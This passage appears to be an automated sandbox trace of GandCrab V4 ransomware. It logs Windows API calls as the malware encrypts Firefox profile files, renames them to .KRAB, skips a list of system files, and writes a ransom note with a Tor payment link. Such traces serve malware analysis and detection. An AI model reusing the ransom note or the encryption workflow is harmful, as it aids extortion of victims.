(lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\kinto.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\kinto.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0081.772] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0081.773] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0081.773] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x100000, lpOverlapped=0x0) returned 1 [0081.920] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.921] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0x100000, lpOverlapped=0x0) returned 1 [0081.923] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x0, lpOverlapped=0x0) returned 1 [0081.923] WriteFile (in: hFile=0x7ec, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0081.946] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.950] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.009] CloseHandle (hObject=0x7ec) returned 1 [0082.009] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.009] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\kinto.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\kinto.sqlite"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\kinto.sqlite.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\kinto.sqlite.krab")) returned 1 [0082.010] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.010] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0082.010] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0082.011] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0082.011] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\KRAB-DECRYPT.txt" [0082.011] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0082.011] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\KRAB-DECRYPT.txt.KRAB") returned 101 [0082.011] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\KRAB-DECRYPT.txt") returned 96 [0082.011] lstrlenW (lpString=".txt") returned 4 [0082.011] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0082.011] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0082.011] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.012] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\KRAB-DECRYPT.txt") returned 96 [0082.012] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\KRAB-DECRYPT.txt") returned 96 [0082.012] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0082.012] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0082.012] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0082.012] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0082.012] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0082.012] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0082.012] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0082.012] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0082.012] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0082.012] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0082.012] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.013] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0082.013] lstrcmpW (lpString1="mimeTypes.rdf", lpString2=".") returned 1 [0082.013] lstrcmpW (lpString1="mimeTypes.rdf", lpString2="..") returned 1 [0082.013] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="mimeTypes.rdf" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\mimeTypes.rdf") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\mimeTypes.rdf" [0082.013] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0082.013] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\mimeTypes.rdf.KRAB") returned 98 [0082.013] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\mimeTypes.rdf") returned 93 [0082.014] lstrlenW (lpString=".rdf") returned 4 [0082.014] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0082.014] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".rdf ") returned 5 [0082.014] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.014] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\mimeTypes.rdf") returned 93 [0082.014] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\mimeTypes.rdf") returned 93 [0082.014] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="desktop.ini") returned 1 [0082.014] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="autorun.inf") returned 1 [0082.014] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="ntuser.dat") returned -1 [0082.014] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="iconcache.db") returned 1 [0082.014] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="bootsect.bak") returned 1 [0082.015] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="boot.ini") returned 1 [0082.015] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="ntuser.dat.log") returned -1 [0082.015] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="thumbs.db") returned -1 [0082.015] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="KRAB-DECRYPT.html") returned 1 [0082.015] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="KRAB-DECRYPT.txt") returned 1 [0082.015] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="CRAB-DECRYPT.txt") returned 1 [0082.015] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="ntldr") returned -1 [0082.015] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="NTDETECT.COM") returned -1 [0082.015] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="Bootfont.bin") returned 1 [0082.015] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0082.015] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1010b50) returned 1 [0082.017] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0082.017] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0082.017] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0082.017] CryptGenRandom (in: hProv=0x1010b50, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0082.017] CryptReleaseContext (hProv=0x1010b50, dwFlags=0x0) returned 1 [0082.018] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.018] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1010df8) returned 1 [0082.019] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0082.020] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0082.020] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0082.020] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0082.020] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0082.020] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.021] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1011898) returned 1 [0082.022] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x1023838) returned 1 [0082.022] CryptGetKeyParam (in: hKey=0x1023838, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0082.022] CryptEncrypt (in: hKey=0x1023838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0082.022] GetLastError () returned 0x0 [0082.023] CryptDestroyKey (hKey=0x1023838) returned 1 [0082.023] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0082.023] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x10113d0) returned 1 [0082.024] CryptImportKey (in: hProv=0x10113d0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x1023838) returned 1 [0082.024] CryptGetKeyParam (in: hKey=0x1023838, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0082.024] CryptEncrypt (in: hKey=0x1023838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0082.025] GetLastError () returned 0x0 [0082.025] CryptDestroyKey (hKey=0x1023838) returned 1 [0082.025] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0082.025] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\mimeTypes.rdf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\mimetypes.rdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0082.026] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0082.026] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0082.026] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0xf23, lpOverlapped=0x0) returned 1 [0082.055] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xfffff0dd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.055] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xf23, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0xf23, lpOverlapped=0x0) returned 1 [0082.056] WriteFile (in: hFile=0x7ec, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0082.056] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.060] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.060] CloseHandle (hObject=0x7ec) returned 1 [0082.060] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.060] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\mimeTypes.rdf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\mimetypes.rdf"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\mimeTypes.rdf.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\mimetypes.rdf.krab")) returned 1 [0082.064] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.064] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0082.064] lstrcmpW (lpString1="minidumps", lpString2=".") returned 1 [0082.064] lstrcmpW (lpString1="minidumps", lpString2="..") returned 1 [0082.064] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="minidumps" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps" [0082.064] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\" [0082.064] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0082.065] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0082.065] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0082.065] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0082.065] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0082.065] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.065] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0082.065] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\\\KRAB-DECRYPT.txt") returned 107 [0082.066] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\minidumps\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0082.066] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0082.066] WriteFile (in: hFile=0x7ec, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e320, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e320*=0x1f6e, lpOverlapped=0x0) returned 1 [0082.067] CloseHandle (hObject=0x7ec) returned 1 [0082.067] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.067] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0082.068] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x1d, wMilliseconds=0x105)) [0082.068] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0082.068] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0082.068] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0082.068] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\d2ca4a08d2ca4dee3d.lock") returned 113 [0082.068] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\minidumps\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x7ec [0082.090] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.091] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.091] lstrlenW 